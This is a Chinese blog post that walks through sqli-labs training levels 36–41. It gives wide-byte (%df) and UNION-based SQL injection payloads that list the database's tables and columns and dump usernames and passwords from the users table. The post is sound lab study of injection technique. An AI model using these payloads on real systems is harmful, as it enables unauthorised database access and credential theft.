当前位置: 首页 > news >正文

sqli-labs靶场less36-less40

less36

1.我们打开靶场之后打开来看一下,输入的内容会被转义,依旧是宽字节注入

2.使用以下宽字节注入,使用的是%df

?id=-1%df%27%20union%20select%201,database(),3--+

3.剩余内容与前面关卡基本一样,只要使用上面的方法合成宽字节即可

less37

1.我们打开靶场之后打开来看一下,它依旧告诉我们输入的内容会被转义,且有登录框

2.我们可以看到需要进行抓包,然后就可以在数据包里面输入以下语句,我们依旧使用%df进行转义

?id=-1%df%27%20union%20select%201,database(),3--+

3.剩余的内容与之前一样,做法与上面相同

less38

1.我们打开靶场之后打开来看一下

2.这一关我们可以使用联和注入来做,语句如下

?id=-1' union select 1,2,3--+
?id=-1' union select 1,2,database()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,password) from users--+

less39

1.我们打开靶场之后打开来看一下

2.我们可以继续使用联合注入来做,不过闭合方式为数字型的,语句如下

?id=-1 union select 1,2,3--+

3.方法和上面一样,语句与上一关基本一样

less40

1.我们打开靶场之后打开来看一下

2.这一关和上一关一样,不过是字符型,闭合方式为‘),语句如下

?id=1')union select 1,2,3--+

3.其余内容除闭合方式外和上一关一样

less41

1.这一关和39关一样为数字型注入

?id=-1 union select 1,2,3--+

2.其余做法和39关一样

http://www.lryc.cn/news/610851.html

相关文章:

  • 是的,或许这就是意识!
  • 【qt5_study】1.Hello world
  • Groovy学习篇章一之—— GDK 探秘:Groovy如何给Java对象“开外挂”,让String也能“跑命令”!
  • Git与TortoiseGit在Gitee平台的应用
  • 从零开始学网页开发:HTML、CSS和JavaScript的基础知识
  • SpringCloud学习-------Eureka详解
  • SpringBoot3.x入门到精通系列:4.3 性能优化技巧
  • HTTP性能优化实战:解决高并发场景下的连接瓶颈与延迟问题
  • 浏览器渲染 首屏优化 性能优化
  • ArrayList 深度剖析:从底层原理到性能优化的实战指南
  • MySQL索引底层原理与性能优化实践
  • 力扣:2246. 相邻字符不同的最长路径
  • 解析图像几何变换:从欧式到仿射再到透视
  • 从达梦到 StarRocks:国产数据库实时入仓实践
  • Python高级编程与实践:Python装饰器深入解析与应用
  • 使用 BAML 模糊解析改进 LangChain 知识图谱提取:成功率从25%提升到99%
  • 力扣刷题日常(15-16)
  • 【Electron】electron-vite中基于electron-builder与electron-updater实现程序远程自动更新,附源码
  • 国产大模型平替方案:Spring Boot通义千问API集成指南
  • 2025 年半导体用铜前驱体市场规模有多大?全景调研及投资前景分析
  • 接口测试用例书写规范
  • 基于 FFmpeg 与 V4L2 的多路摄像头视频采集,图像处理处理与 RTMP 推流项目(开源)
  • 【教育教学】人才培养方案制定
  • Linux内核C语言代码规范
  • MySQL内外连接详解
  • Python 基础语法(二):流程控制语句详解
  • 【Qt开发】常用控件(一)
  • 嵌入式硬件中运放的基本控制原理
  • 选佳沐信,智享便捷,乐在其中
  • LeetCode——2683. 相邻值的按位异或